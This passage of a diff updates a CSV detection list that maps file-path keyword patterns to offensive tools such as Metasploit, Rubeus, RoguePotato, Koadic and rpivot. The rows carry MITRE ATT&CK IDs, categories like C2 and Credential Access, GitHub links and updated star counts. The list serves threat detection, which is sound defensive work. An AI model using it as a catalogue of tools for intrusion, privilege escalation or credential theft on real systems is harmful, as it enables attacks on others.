TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/rockyou.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/RoguePotato.git*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*/RogueWinRMdll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/RogueWinRMexe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/RoguePotato.git*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*/RogueWinRMdll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/RogueWinRMexe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/root/.mozilla/firefox/*.Exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/root/output/ratchatPT*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/root/shellcode.c*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" @@ -5035,18 +5086,18 @@ "*/root/viper/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*/root/viper/dist*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*/rop_emporium*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"*/ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "*/ropfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" -"*/rottenpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/rottenpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/rpcap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/rpcbomb.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/rpcbomb.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/rpc-grind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcrt.py *","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","0","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*/rpivot.git*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*/rsa-vuln-roca.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/rservices_from_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/rservices_from_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/rsocx-*-linux-x86-64.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsocx-*-windows-x86-64.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsocx.exe*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" @@ -5055,56 +5106,59 @@ "*/rsync-list-modules.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rtsp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rtsp-url-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Rubeus*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*/Rubeus/*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/Rubeus*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/Rubeus/*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*/Rudrastra.git*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" -"*/rulerforms.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*/run/leet.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/run_as_psh.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/rulerforms.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/run/leet.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/run_as_psh.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/RunasCs.git*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/RunasCs.git*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/RunasCs.zip*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*/runasppl.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/RunAsWinTcb.git*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/RunAsWinTcb.iml*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" -"*/runcalc.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/runcalc.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/rundll32.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/rundll32_js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/RunOF/RunOF/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 